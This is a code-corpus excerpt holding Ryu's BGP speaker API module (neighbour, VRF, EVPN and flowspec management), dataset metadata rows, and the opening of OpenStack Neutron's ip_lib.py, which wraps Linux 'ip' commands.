raise ValueError('Unsupported route_family: %s' % route_family)
func_name = 'neighbor.attribute_map.set'
param = {
neighbors.IP_ADDRESS: address,
neighbors.ATTRIBUTE_MAP: attribute_maps,
}
if route_dist is not None:
param[vrfs.ROUTE_DISTINGUISHER] = route_dist
param[vrfs.VRF_RF] = route_family
call(func_name, **param)
def attribute_map_get(self, address, route_dist=None,
route_family=RF_VPN_V4):
"""This method gets in-bound filters of the specified neighbor.
``address`` specifies the IP address of the neighbor.
``route_dist`` specifies route distinguisher that has attribute_maps.
``route_family`` specifies route family of the VRF.
This parameter must be one of the following.
- RF_VPN_V4 (default) = 'ipv4'
- RF_VPN_V6 = 'ipv6'
Returns a list object containing an instance of AttributeMap
"""
if route_family not in SUPPORTED_VRF_RF:
raise ValueError('Unsupported route_family: %s' % route_family)
func_name = 'neighbor.attribute_map.get'
param = {
neighbors.IP_ADDRESS: address,
}
if route_dist is not None:
param[vrfs.ROUTE_DISTINGUISHER] = route_dist
param[vrfs.VRF_RF] = route_family
return call(func_name, **param)
@staticmethod
def _check_rf_and_normalize(prefix):
""" check prefix's route_family and if the address is
IPv6 address, return IPv6 route_family and normalized IPv6 address.
If the address is IPv4 address, return IPv4 route_family
and the prefix itself.
"""
ip, masklen = prefix.split('/')
if netaddr.valid_ipv6(ip):
# normalize IPv6 address
ipv6_prefix = str(netaddr.IPAddress(ip)) + '/' + masklen
return vrfs.VRF_RF_IPV6, ipv6_prefix
else:
return vrfs.VRF_RF_IPV4, prefix
| 38.428467 | 87 | 0.637757 |
import netaddr
from ryu.lib import hub
from ryu.lib.packet.bgp import (
BGPFlowSpecTrafficActionCommunity,
BGPFlowSpecVlanActionCommunity,
BGPFlowSpecTPIDActionCommunity,
)
from ryu.services.protocols.bgp.core_manager import CORE_MANAGER
from ryu.services.protocols.bgp.signals.emit import BgpSignalBus
from ryu.services.protocols.bgp.api.base import call
from ryu.services.protocols.bgp.api.base import PREFIX
from ryu.services.protocols.bgp.api.base import EVPN_ROUTE_TYPE
from ryu.services.protocols.bgp.api.base import EVPN_ESI
from ryu.services.protocols.bgp.api.base import EVPN_ETHERNET_TAG_ID
from ryu.services.protocols.bgp.api.base import REDUNDANCY_MODE
from ryu.services.protocols.bgp.api.base import IP_ADDR
from ryu.services.protocols.bgp.api.base import MAC_ADDR
from ryu.services.protocols.bgp.api.base import NEXT_HOP
from ryu.services.protocols.bgp.api.base import IP_PREFIX
from ryu.services.protocols.bgp.api.base import GW_IP_ADDR
from ryu.services.protocols.bgp.api.base import ROUTE_DISTINGUISHER
from ryu.services.protocols.bgp.api.base import ROUTE_FAMILY
from ryu.services.protocols.bgp.api.base import EVPN_VNI
from ryu.services.protocols.bgp.api.base import TUNNEL_TYPE
from ryu.services.protocols.bgp.api.base import PMSI_TUNNEL_TYPE
from ryu.services.protocols.bgp.api.prefix import EVPN_MAX_ET
from ryu.services.protocols.bgp.api.prefix import ESI_TYPE_LACP
from ryu.services.protocols.bgp.api.prefix import ESI_TYPE_L2_BRIDGE
from ryu.services.protocols.bgp.api.prefix import ESI_TYPE_MAC_BASED
from ryu.services.protocols.bgp.api.prefix import EVPN_ETH_AUTO_DISCOVERY
from ryu.services.protocols.bgp.api.prefix import EVPN_MAC_IP_ADV_ROUTE
from ryu.services.protocols.bgp.api.prefix import EVPN_MULTICAST_ETAG_ROUTE
from ryu.services.protocols.bgp.api.prefix import EVPN_ETH_SEGMENT
from ryu.services.protocols.bgp.api.prefix import EVPN_IP_PREFIX_ROUTE
from ryu.services.protocols.bgp.api.prefix import REDUNDANCY_MODE_ALL_ACTIVE
from ryu.services.protocols.bgp.api.prefix import REDUNDANCY_MODE_SINGLE_ACTIVE
from ryu.services.protocols.bgp.api.prefix import TUNNEL_TYPE_VXLAN
from ryu.services.protocols.bgp.api.prefix import TUNNEL_TYPE_NVGRE
from ryu.services.protocols.bgp.api.prefix import (
PMSI_TYPE_NO_TUNNEL_INFO,
PMSI_TYPE_INGRESS_REP)
from ryu.services.protocols.bgp.api.prefix import (
FLOWSPEC_FAMILY,
FLOWSPEC_FAMILY_IPV4,
FLOWSPEC_FAMILY_VPNV4,
FLOWSPEC_FAMILY_IPV6,
FLOWSPEC_FAMILY_VPNV6,
FLOWSPEC_FAMILY_L2VPN,
FLOWSPEC_RULES,
FLOWSPEC_ACTIONS)
from ryu.services.protocols.bgp.rtconf.common import LOCAL_AS
from ryu.services.protocols.bgp.rtconf.common import ROUTER_ID
from ryu.services.protocols.bgp.rtconf.common import CLUSTER_ID
from ryu.services.protocols.bgp.rtconf.common import BGP_SERVER_HOSTS
from ryu.services.protocols.bgp.rtconf.common import BGP_SERVER_PORT
from ryu.services.protocols.bgp.rtconf.common import DEFAULT_BGP_SERVER_HOSTS
from ryu.services.protocols.bgp.rtconf.common import DEFAULT_BGP_SERVER_PORT
from ryu.services.protocols.bgp.rtconf.common import (
DEFAULT_REFRESH_MAX_EOR_TIME, DEFAULT_REFRESH_STALEPATH_TIME)
from ryu.services.protocols.bgp.rtconf.common import DEFAULT_LABEL_RANGE
from ryu.services.protocols.bgp.rtconf.common import REFRESH_MAX_EOR_TIME
from ryu.services.protocols.bgp.rtconf.common import REFRESH_STALEPATH_TIME
from ryu.services.protocols.bgp.rtconf.common import LABEL_RANGE
from ryu.services.protocols.bgp.rtconf.common import ALLOW_LOCAL_AS_IN_COUNT
from ryu.services.protocols.bgp.rtconf.common import LOCAL_PREF
from ryu.services.protocols.bgp.rtconf.common import DEFAULT_LOCAL_PREF
from ryu.services.protocols.bgp.rtconf import neighbors
from ryu.services.protocols.bgp.rtconf import vrfs
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_IPV4
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_IPV6
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_VPNV4
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_VPNV6
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_EVPN
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_IPV4FS
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_IPV6FS
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_VPNV4FS
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_VPNV6FS
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_L2VPNFS
from ryu.services.protocols.bgp.rtconf.base import CAP_ENHANCED_REFRESH
from ryu.services.protocols.bgp.rtconf.base import CAP_FOUR_OCTET_AS_NUMBER
from ryu.services.protocols.bgp.rtconf.base import HOLD_TIME
from ryu.services.protocols.bgp.rtconf.base import MULTI_EXIT_DISC
from ryu.services.protocols.bgp.rtconf.base import SITE_OF_ORIGINS
from ryu.services.protocols.bgp.rtconf.neighbors import (
DEFAULT_CAP_MBGP_IPV4,
DEFAULT_CAP_MBGP_IPV6,
DEFAULT_CAP_MBGP_VPNV4,
DEFAULT_CAP_MBGP_VPNV6,
DEFAULT_CAP_MBGP_EVPN,
DEFAULT_CAP_MBGP_IPV4FS,
DEFAULT_CAP_MBGP_IPV6FS,
DEFAULT_CAP_MBGP_VPNV4FS,
DEFAULT_CAP_MBGP_VPNV6FS,
DEFAULT_CAP_MBGP_L2VPNFS,
DEFAULT_HOLD_TIME,
)
from ryu.services.protocols.bgp.rtconf.neighbors import (
DEFAULT_CAP_ENHANCED_REFRESH, DEFAULT_CAP_FOUR_OCTET_AS_NUMBER)
from ryu.services.protocols.bgp.rtconf.neighbors import DEFAULT_CONNECT_MODE
from ryu.services.protocols.bgp.rtconf.neighbors import PEER_NEXT_HOP
from ryu.services.protocols.bgp.rtconf.neighbors import PASSWORD
from ryu.services.protocols.bgp.rtconf.neighbors import (
DEFAULT_IS_ROUTE_SERVER_CLIENT, IS_ROUTE_SERVER_CLIENT)
from ryu.services.protocols.bgp.rtconf.neighbors import (
DEFAULT_IS_ROUTE_REFLECTOR_CLIENT, IS_ROUTE_REFLECTOR_CLIENT)
from ryu.services.protocols.bgp.rtconf.neighbors import (
DEFAULT_IS_NEXT_HOP_SELF, IS_NEXT_HOP_SELF)
from ryu.services.protocols.bgp.rtconf.neighbors import CONNECT_MODE
from ryu.services.protocols.bgp.rtconf.neighbors import LOCAL_ADDRESS
from ryu.services.protocols.bgp.rtconf.neighbors import LOCAL_PORT
from ryu.services.protocols.bgp.rtconf.vrfs import SUPPORTED_VRF_RF
from ryu.services.protocols.bgp.info_base.base import Filter
from ryu.services.protocols.bgp.info_base.ipv4 import Ipv4Path
from ryu.services.protocols.bgp.info_base.ipv6 import Ipv6Path
from ryu.services.protocols.bgp.info_base.vpnv4 import Vpnv4Path
from ryu.services.protocols.bgp.info_base.vpnv6 import Vpnv6Path
from ryu.services.protocols.bgp.info_base.evpn import EvpnPath
NEIGHBOR_CONF_MED = MULTI_EXIT_DISC RF_VPN_V4 = vrfs.VRF_RF_IPV4
RF_VPN_V6 = vrfs.VRF_RF_IPV6
RF_L2_EVPN = vrfs.VRF_RF_L2_EVPN
RF_VPNV4_FLOWSPEC = vrfs.VRF_RF_IPV4_FLOWSPEC
RF_VPNV6_FLOWSPEC = vrfs.VRF_RF_IPV6_FLOWSPEC
RF_L2VPN_FLOWSPEC = vrfs.VRF_RF_L2VPN_FLOWSPEC
FLOWSPEC_TA_SAMPLE = BGPFlowSpecTrafficActionCommunity.SAMPLE
FLOWSPEC_TA_TERMINAL = BGPFlowSpecTrafficActionCommunity.TERMINAL
FLOWSPEC_VLAN_POP = BGPFlowSpecVlanActionCommunity.POP
FLOWSPEC_VLAN_PUSH = BGPFlowSpecVlanActionCommunity.PUSH
FLOWSPEC_VLAN_SWAP = BGPFlowSpecVlanActionCommunity.SWAP
FLOWSPEC_VLAN_RW_INNER = BGPFlowSpecVlanActionCommunity.REWRITE_INNER
FLOWSPEC_VLAN_RW_OUTER = BGPFlowSpecVlanActionCommunity.REWRITE_OUTER
FLOWSPEC_TPID_TI = BGPFlowSpecTPIDActionCommunity.TI
FLOWSPEC_TPID_TO = BGPFlowSpecTPIDActionCommunity.TO
class EventPrefix(object):
def __init__(self, path, is_withdraw):
self.path = path
self.is_withdraw = is_withdraw
@property
def remote_as(self):
return self.path.source.remote_as
@property
def route_dist(self):
if (isinstance(self.path, Vpnv4Path)
or isinstance(self.path, Vpnv6Path)
or isinstance(self.path, EvpnPath)):
return self.path.nlri.route_dist
else:
return None
@property
def prefix(self):
if isinstance(self.path, Ipv4Path) or isinstance(self.path, Ipv6Path):
return self.path.nlri.addr + '/' + str(self.path.nlri.length)
elif (isinstance(self.path, Vpnv4Path)
or isinstance(self.path, Vpnv6Path)
or isinstance(self.path, EvpnPath)):
return self.path.nlri.prefix
else:
return None
@property
def nexthop(self):
return self.path.nexthop
@property
def label(self):
if (isinstance(self.path, Vpnv4Path)
or isinstance(self.path, Vpnv6Path)
or isinstance(self.path, EvpnPath)):
return getattr(self.path.nlri, 'label_list', None)
else:
return None
class BGPSpeaker(object):
def __init__(self, as_number, router_id,
bgp_server_hosts=DEFAULT_BGP_SERVER_HOSTS,
bgp_server_port=DEFAULT_BGP_SERVER_PORT,
refresh_stalepath_time=DEFAULT_REFRESH_STALEPATH_TIME,
refresh_max_eor_time=DEFAULT_REFRESH_MAX_EOR_TIME,
best_path_change_handler=None,
peer_down_handler=None,
peer_up_handler=None,
ssh_console=False,
ssh_port=None, ssh_host=None, ssh_host_key=None,
label_range=DEFAULT_LABEL_RANGE,
allow_local_as_in_count=0,
cluster_id=None,
local_pref=DEFAULT_LOCAL_PREF):
super(BGPSpeaker, self).__init__()
settings = {
LOCAL_AS: as_number,
ROUTER_ID: router_id,
BGP_SERVER_HOSTS: bgp_server_hosts,
BGP_SERVER_PORT: bgp_server_port,
REFRESH_STALEPATH_TIME: refresh_stalepath_time,
REFRESH_MAX_EOR_TIME: refresh_max_eor_time,
LABEL_RANGE: label_range,
ALLOW_LOCAL_AS_IN_COUNT: allow_local_as_in_count,
CLUSTER_ID: cluster_id,
LOCAL_PREF: local_pref,
}
self._core_start(settings)
self._init_signal_listeners()
self._best_path_change_handler = best_path_change_handler
self._peer_down_handler = peer_down_handler
self._peer_up_handler = peer_up_handler
if ssh_console:
from ryu.services.protocols.bgp.operator import ssh
ssh_settings = {
ssh.SSH_PORT: ssh_port or ssh.DEFAULT_SSH_PORT,
ssh.SSH_HOST: ssh_host or ssh.DEFAULT_SSH_HOST,
ssh.SSH_HOST_KEY: ssh_host_key or ssh.DEFAULT_SSH_HOST_KEY,
}
hub.spawn(ssh.SSH_CLI_CONTROLLER.start, **ssh_settings)
def _notify_peer_down(self, peer):
remote_ip = peer.ip_address
remote_as = peer.remote_as
if self._peer_down_handler:
self._peer_down_handler(remote_ip, remote_as)
def _notify_peer_up(self, peer):
remote_ip = peer.ip_address
remote_as = peer.remote_as
if self._peer_up_handler:
self._peer_up_handler(remote_ip, remote_as)
def _notify_best_path_changed(self, path, is_withdraw):
if (not path.source
or not isinstance(path, (Ipv4Path, Ipv6Path,
Vpnv4Path, Vpnv6Path, EvpnPath))):
return
ev = EventPrefix(path, is_withdraw)
if self._best_path_change_handler:
self._best_path_change_handler(ev)
def _init_signal_listeners(self):
CORE_MANAGER.get_core_service()._signal_bus.register_listener(
BgpSignalBus.BGP_BEST_PATH_CHANGED,
lambda _, info:
self._notify_best_path_changed(info['path'],
info['is_withdraw'])
)
CORE_MANAGER.get_core_service()._signal_bus.register_listener(
BgpSignalBus.BGP_ADJ_DOWN,
lambda _, info:
self._notify_peer_down(info['peer'])
)
CORE_MANAGER.get_core_service()._signal_bus.register_listener(
BgpSignalBus.BGP_ADJ_UP,
lambda _, info:
self._notify_peer_up(info['peer'])
)
def _core_start(self, settings):
waiter = hub.Event()
call('core.start', waiter=waiter, **settings)
waiter.wait()
def _serve_forever(self):
pass
def shutdown(self):
call('core.stop')
def neighbor_add(self, address, remote_as,
enable_ipv4=DEFAULT_CAP_MBGP_IPV4,
enable_ipv6=DEFAULT_CAP_MBGP_IPV6,
enable_vpnv4=DEFAULT_CAP_MBGP_VPNV4,
enable_vpnv6=DEFAULT_CAP_MBGP_VPNV6,
enable_evpn=DEFAULT_CAP_MBGP_EVPN,
enable_ipv4fs=DEFAULT_CAP_MBGP_IPV4FS,
enable_ipv6fs=DEFAULT_CAP_MBGP_IPV6FS,
enable_vpnv4fs=DEFAULT_CAP_MBGP_VPNV4FS,
enable_vpnv6fs=DEFAULT_CAP_MBGP_VPNV6FS,
enable_l2vpnfs=DEFAULT_CAP_MBGP_L2VPNFS,
enable_enhanced_refresh=DEFAULT_CAP_ENHANCED_REFRESH,
enable_four_octet_as_number=DEFAULT_CAP_FOUR_OCTET_AS_NUMBER,
next_hop=None, password=None, multi_exit_disc=None,
site_of_origins=None,
is_route_server_client=DEFAULT_IS_ROUTE_SERVER_CLIENT,
is_route_reflector_client=DEFAULT_IS_ROUTE_REFLECTOR_CLIENT,
is_next_hop_self=DEFAULT_IS_NEXT_HOP_SELF,
local_address=None,
local_port=None, local_as=None,
connect_mode=DEFAULT_CONNECT_MODE,
hold_time=DEFAULT_HOLD_TIME):
bgp_neighbor = {
neighbors.IP_ADDRESS: address,
neighbors.REMOTE_AS: remote_as,
PEER_NEXT_HOP: next_hop,
PASSWORD: password,
IS_ROUTE_SERVER_CLIENT: is_route_server_client,
IS_ROUTE_REFLECTOR_CLIENT: is_route_reflector_client,
IS_NEXT_HOP_SELF: is_next_hop_self,
CONNECT_MODE: connect_mode,
CAP_ENHANCED_REFRESH: enable_enhanced_refresh,
CAP_FOUR_OCTET_AS_NUMBER: enable_four_octet_as_number,
CAP_MBGP_IPV4: enable_ipv4,
CAP_MBGP_IPV6: enable_ipv6,
CAP_MBGP_VPNV4: enable_vpnv4,
CAP_MBGP_VPNV6: enable_vpnv6,
CAP_MBGP_EVPN: enable_evpn,
CAP_MBGP_IPV4FS: enable_ipv4fs,
CAP_MBGP_IPV6FS: enable_ipv6fs,
CAP_MBGP_VPNV4FS: enable_vpnv4fs,
CAP_MBGP_VPNV6FS: enable_vpnv6fs,
CAP_MBGP_L2VPNFS: enable_l2vpnfs,
HOLD_TIME: hold_time,
}
if multi_exit_disc:
bgp_neighbor[MULTI_EXIT_DISC] = multi_exit_disc
if site_of_origins:
bgp_neighbor[SITE_OF_ORIGINS] = site_of_origins
if local_address:
bgp_neighbor[LOCAL_ADDRESS] = local_address
if local_port:
bgp_neighbor[LOCAL_PORT] = local_port
if local_as:
bgp_neighbor[LOCAL_AS] = local_as
call('neighbor.create', **bgp_neighbor)
def neighbor_del(self, address):
bgp_neighbor = {
neighbors.IP_ADDRESS: address,
}
call('neighbor.delete', **bgp_neighbor)
def neighbor_reset(self, address):
bgp_neighbor = {
neighbors.IP_ADDRESS: address,
}
call('core.reset_neighbor', **bgp_neighbor)
def neighbor_update(self, address, conf_type, conf_value):
assert conf_type == MULTI_EXIT_DISC or conf_type == CONNECT_MODE
func_name = 'neighbor.update'
attribute_param = {}
if conf_type == MULTI_EXIT_DISC:
attribute_param = {neighbors.MULTI_EXIT_DISC: conf_value}
elif conf_type == CONNECT_MODE:
attribute_param = {neighbors.CONNECT_MODE: conf_value}
param = {neighbors.IP_ADDRESS: address,
neighbors.CHANGES: attribute_param}
call(func_name, **param)
def neighbor_state_get(self, address=None, format='json'):
show = {
'params': ['neighbor', 'summary'],
'format': format,
}
if address:
show['params'].append(address)
return call('operator.show', **show)
def prefix_add(self, prefix, next_hop=None, route_dist=None):
func_name = 'network.add'
networks = {
PREFIX: prefix,
}
if next_hop:
networks[NEXT_HOP] = next_hop
if route_dist:
func_name = 'prefix.add_local'
networks[ROUTE_DISTINGUISHER] = route_dist
rf, p = self._check_rf_and_normalize(prefix)
networks[ROUTE_FAMILY] = rf
networks[PREFIX] = p
if rf == vrfs.VRF_RF_IPV6 and netaddr.valid_ipv4(next_hop):
networks[NEXT_HOP] = \
str(netaddr.IPAddress(next_hop).ipv6())
return call(func_name, **networks)
def prefix_del(self, prefix, route_dist=None):
func_name = 'network.del'
networks = {
PREFIX: prefix,
}
if route_dist:
func_name = 'prefix.delete_local'
networks[ROUTE_DISTINGUISHER] = route_dist
rf, p = self._check_rf_and_normalize(prefix)
networks[ROUTE_FAMILY] = rf
networks[PREFIX] = p
call(func_name, **networks)
def evpn_prefix_add(self, route_type, route_dist, esi=0,
ethernet_tag_id=None, mac_addr=None, ip_addr=None,
ip_prefix=None, gw_ip_addr=None, vni=None,
next_hop=None, tunnel_type=None, pmsi_tunnel_type=None,
redundancy_mode=None):
func_name = 'evpn_prefix.add_local'
if not next_hop:
next_hop = '0.0.0.0'
kwargs = {EVPN_ROUTE_TYPE: route_type,
ROUTE_DISTINGUISHER: route_dist,
NEXT_HOP: next_hop}
if tunnel_type in [TUNNEL_TYPE_VXLAN, TUNNEL_TYPE_NVGRE]:
kwargs[TUNNEL_TYPE] = tunnel_type
elif tunnel_type is not None:
raise ValueError('Unsupported tunnel type: %s' % tunnel_type)
if route_type == EVPN_ETH_AUTO_DISCOVERY:
kwargs.update({
EVPN_ESI: esi,
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
})
if vni is not None:
kwargs[EVPN_VNI] = vni
if redundancy_mode in [
REDUNDANCY_MODE_ALL_ACTIVE,
REDUNDANCY_MODE_SINGLE_ACTIVE]:
kwargs[REDUNDANCY_MODE] = redundancy_mode
elif redundancy_mode is not None:
raise ValueError('Unsupported Redundancy Mode: %s' %
redundancy_mode)
elif route_type == EVPN_MAC_IP_ADV_ROUTE:
kwargs.update({
EVPN_ESI: esi,
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
MAC_ADDR: mac_addr,
IP_ADDR: ip_addr,
})
if tunnel_type in [TUNNEL_TYPE_VXLAN, TUNNEL_TYPE_NVGRE]:
kwargs[EVPN_VNI] = vni
elif route_type == EVPN_MULTICAST_ETAG_ROUTE:
kwargs.update({
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
IP_ADDR: ip_addr,
})
if tunnel_type in [TUNNEL_TYPE_VXLAN, TUNNEL_TYPE_NVGRE]:
kwargs[EVPN_VNI] = vni
if pmsi_tunnel_type in [
PMSI_TYPE_NO_TUNNEL_INFO,
PMSI_TYPE_INGRESS_REP]:
kwargs[PMSI_TUNNEL_TYPE] = pmsi_tunnel_type
elif pmsi_tunnel_type is not None:
raise ValueError('Unsupported PMSI tunnel type: %s' %
pmsi_tunnel_type)
elif route_type == EVPN_ETH_SEGMENT:
kwargs.update({
EVPN_ESI: esi,
IP_ADDR: ip_addr,
})
elif route_type == EVPN_IP_PREFIX_ROUTE:
kwargs.update({
EVPN_ESI: esi,
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
IP_PREFIX: ip_prefix,
GW_IP_ADDR: gw_ip_addr,
})
if tunnel_type in [TUNNEL_TYPE_VXLAN, TUNNEL_TYPE_NVGRE]:
kwargs[EVPN_VNI] = vni
else:
raise ValueError('Unsupported EVPN route type: %s' % route_type)
call(func_name, **kwargs)
def evpn_prefix_del(self, route_type, route_dist, esi=0,
ethernet_tag_id=None, mac_addr=None, ip_addr=None,
ip_prefix=None):
func_name = 'evpn_prefix.delete_local'
kwargs = {EVPN_ROUTE_TYPE: route_type,
ROUTE_DISTINGUISHER: route_dist}
if route_type == EVPN_ETH_AUTO_DISCOVERY:
kwargs.update({
EVPN_ESI: esi,
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
})
elif route_type == EVPN_MAC_IP_ADV_ROUTE:
kwargs.update({
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
MAC_ADDR: mac_addr,
IP_ADDR: ip_addr,
})
elif route_type == EVPN_MULTICAST_ETAG_ROUTE:
kwargs.update({
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
IP_ADDR: ip_addr,
})
elif route_type == EVPN_ETH_SEGMENT:
kwargs.update({
EVPN_ESI: esi,
IP_ADDR: ip_addr,
})
elif route_type == EVPN_IP_PREFIX_ROUTE:
kwargs.update({
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
IP_PREFIX: ip_prefix,
})
else:
raise ValueError('Unsupported EVPN route type: %s' % route_type)
call(func_name, **kwargs)
def flowspec_prefix_add(self, flowspec_family, rules, route_dist=None,
actions=None):
func_name = 'flowspec.add'
kwargs = {
FLOWSPEC_FAMILY: flowspec_family,
FLOWSPEC_RULES: rules,
FLOWSPEC_ACTIONS: actions or {},
}
if flowspec_family in [FLOWSPEC_FAMILY_VPNV4, FLOWSPEC_FAMILY_VPNV6,
FLOWSPEC_FAMILY_L2VPN]:
func_name = 'flowspec.add_local'
kwargs.update({ROUTE_DISTINGUISHER: route_dist})
call(func_name, **kwargs)
def flowspec_prefix_del(self, flowspec_family, rules, route_dist=None):
func_name = 'flowspec.del'
kwargs = {
FLOWSPEC_FAMILY: flowspec_family,
FLOWSPEC_RULES: rules,
}
if flowspec_family in [FLOWSPEC_FAMILY_VPNV4, FLOWSPEC_FAMILY_VPNV6,
FLOWSPEC_FAMILY_L2VPN]:
func_name = 'flowspec.del_local'
kwargs.update({ROUTE_DISTINGUISHER: route_dist})
call(func_name, **kwargs)
def vrf_add(self, route_dist, import_rts, export_rts, site_of_origins=None,
route_family=RF_VPN_V4, multi_exit_disc=None):
if route_family not in SUPPORTED_VRF_RF:
raise ValueError('Unsupported route_family: %s' % route_family)
vrf = {
vrfs.ROUTE_DISTINGUISHER: route_dist,
vrfs.IMPORT_RTS: import_rts,
vrfs.EXPORT_RTS: export_rts,
vrfs.SITE_OF_ORIGINS: site_of_origins,
vrfs.VRF_RF: route_family,
vrfs.MULTI_EXIT_DISC: multi_exit_disc,
}
call('vrf.create', **vrf)
def vrf_del(self, route_dist):
vrf = {vrfs.ROUTE_DISTINGUISHER: route_dist}
call('vrf.delete', **vrf)
def vrfs_get(self, subcommand='routes', route_dist=None,
route_family='all', format='json'):
show = {
'format': format,
}
if route_family in SUPPORTED_VRF_RF:
assert route_dist is not None
show['params'] = ['vrf', subcommand, route_dist, route_family]
else:
show['params'] = ['vrf', subcommand, 'all']
return call('operator.show', **show)
def rib_get(self, family='all', format='json'):
show = {
'params': ['rib', family],
'format': format
}
return call('operator.show', **show)
def neighbor_get(self, route_type, address, format='json'):
show = {
'format': format,
}
if route_type == 'sent-routes' or route_type == 'received-routes':
show['params'] = ['neighbor', route_type, address, 'all']
else:
show['params'] = ['neighbor', 'received-routes', address, 'all']
return call('operator.show', **show)
def neighbors_get(self, format='json'):
show = {
'params': ['neighbor'],
'format': format,
}
return call('operator.show', **show)
def _set_filter(self, filter_type, address, filters):
assert filter_type in ('in', 'out'), (
"filter type must be 'in' or 'out'")
assert all(isinstance(f, Filter) for f in filters), (
'all the items in filters must be an instance of Filter sub-class')
if filters is None:
filters = []
func_name = 'neighbor.' + filter_type + '_filter.set'
param = {
neighbors.IP_ADDRESS: address,
}
if filter_type == 'in':
param[neighbors.IN_FILTER] = filters
else:
param[neighbors.OUT_FILTER] = filters
call(func_name, **param)
def out_filter_set(self, address, filters):
self._set_filter('out', address, filters)
def out_filter_get(self, address):
func_name = 'neighbor.out_filter.get'
param = {
neighbors.IP_ADDRESS: address,
}
return call(func_name, **param)
def in_filter_set(self, address, filters):
self._set_filter('in', address, filters)
def in_filter_get(self, address):
func_name = 'neighbor.in_filter.get'
param = {
neighbors.IP_ADDRESS: address,
}
return call(func_name, **param)
def bmp_server_add(self, address, port):
func_name = 'bmp.start'
param = {
'host': address,
'port': port,
}
call(func_name, **param)
def bmp_server_del(self, address, port):
func_name = 'bmp.stop'
param = {
'host': address,
'port': port,
}
call(func_name, **param)
def attribute_map_set(self, address, attribute_maps,
route_dist=None, route_family=RF_VPN_V4):
if route_family not in SUPPORTED_VRF_RF:
raise ValueError('Unsupported route_family: %s' % route_family)
func_name = 'neighbor.attribute_map.set'
param = {
neighbors.IP_ADDRESS: address,
neighbors.ATTRIBUTE_MAP: attribute_maps,
}
if route_dist is not None:
param[vrfs.ROUTE_DISTINGUISHER] = route_dist
param[vrfs.VRF_RF] = route_family
call(func_name, **param)
def attribute_map_get(self, address, route_dist=None,
route_family=RF_VPN_V4):
if route_family not in SUPPORTED_VRF_RF:
raise ValueError('Unsupported route_family: %s' % route_family)
func_name = 'neighbor.attribute_map.get'
param = {
neighbors.IP_ADDRESS: address,
}
if route_dist is not None:
param[vrfs.ROUTE_DISTINGUISHER] = route_dist
param[vrfs.VRF_RF] = route_family
return call(func_name, **param)
@staticmethod
def _check_rf_and_normalize(prefix):
ip, masklen = prefix.split('/')
if netaddr.valid_ipv6(ip):
ipv6_prefix = str(netaddr.IPAddress(ip)) + '/' + masklen
return vrfs.VRF_RF_IPV6, ipv6_prefix
else:
return vrfs.VRF_RF_IPV4, prefix
| true | true |
1c4aa49b54346a99f2e75e366d65a02354ae6854 | 24,529 | py | Python | neutron/agent/linux/ip_lib.py | insequent/neutron | 2b1c4f121e3e8ba1c5eb2ba6661bf6326e1507c5 | [
"Apache-2.0"
] | null | null | null | neutron/agent/linux/ip_lib.py | insequent/neutron | 2b1c4f121e3e8ba1c5eb2ba6661bf6326e1507c5 | [
"Apache-2.0"
] | null | null | null | neutron/agent/linux/ip_lib.py | insequent/neutron | 2b1c4f121e3e8ba1c5eb2ba6661bf6326e1507c5 | [
"Apache-2.0"
] | null | null | null | # Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import eventlet
import netaddr
import os
from oslo_config import cfg
from oslo_log import log as logging
from neutron.agent.linux import utils
from neutron.common import exceptions
from neutron.i18n import _LE
LOG = logging.getLogger(__name__)
OPTS = [
cfg.BoolOpt('ip_lib_force_root',
default=False,
help=_('Force ip_lib calls to use the root helper')),
]
LOOPBACK_DEVNAME = 'lo'
SYS_NET_PATH = '/sys/class/net'
class SubProcessBase(object):
def __init__(self, namespace=None,
log_fail_as_error=True):
self.namespace = namespace
self.log_fail_as_error = log_fail_as_error
try:
self.force_root = cfg.CONF.ip_lib_force_root
except cfg.NoSuchOptError:
# Only callers that need to force use of the root helper
# need to register the option.
self.force_root = False
def _run(self, options, command, args):
if self.namespace:
return self._as_root(options, command, args)
elif self.force_root:
# Force use of the root helper to ensure that commands
# will execute in dom0 when running under XenServer/XCP.
return self._execute(options, command, args, run_as_root=True,
log_fail_as_error=self.log_fail_as_error)
else:
return self._execute(options, command, args,
log_fail_as_error=self.log_fail_as_error)
def _as_root(self, options, command, args, use_root_namespace=False):
namespace = self.namespace if not use_root_namespace else None
return self._execute(options, command, args, run_as_root=True,
namespace=namespace,
log_fail_as_error=self.log_fail_as_error)
@classmethod
def _execute(cls, options, command, args, run_as_root=False,
namespace=None, log_fail_as_error=True):
opt_list = ['-%s' % o for o in options]
ip_cmd = add_namespace_to_cmd(['ip'], namespace)
cmd = ip_cmd + opt_list + [command] + list(args)
return utils.execute(cmd, run_as_root=run_as_root,
log_fail_as_error=log_fail_as_error)
def set_log_fail_as_error(self, fail_with_error):
self.log_fail_as_error = fail_with_error
class IPWrapper(SubProcessBase):
def __init__(self, namespace=None):
super(IPWrapper, self).__init__(namespace=namespace)
self.netns = IpNetnsCommand(self)
def device(self, name):
return IPDevice(name, namespace=self.namespace)
def get_devices(self, exclude_loopback=False):
retval = []
if self.namespace:
# we call out manually because in order to avoid screen scraping
# iproute2 we use find to see what is in the sysfs directory, as
# suggested by Stephen Hemminger (iproute2 dev).
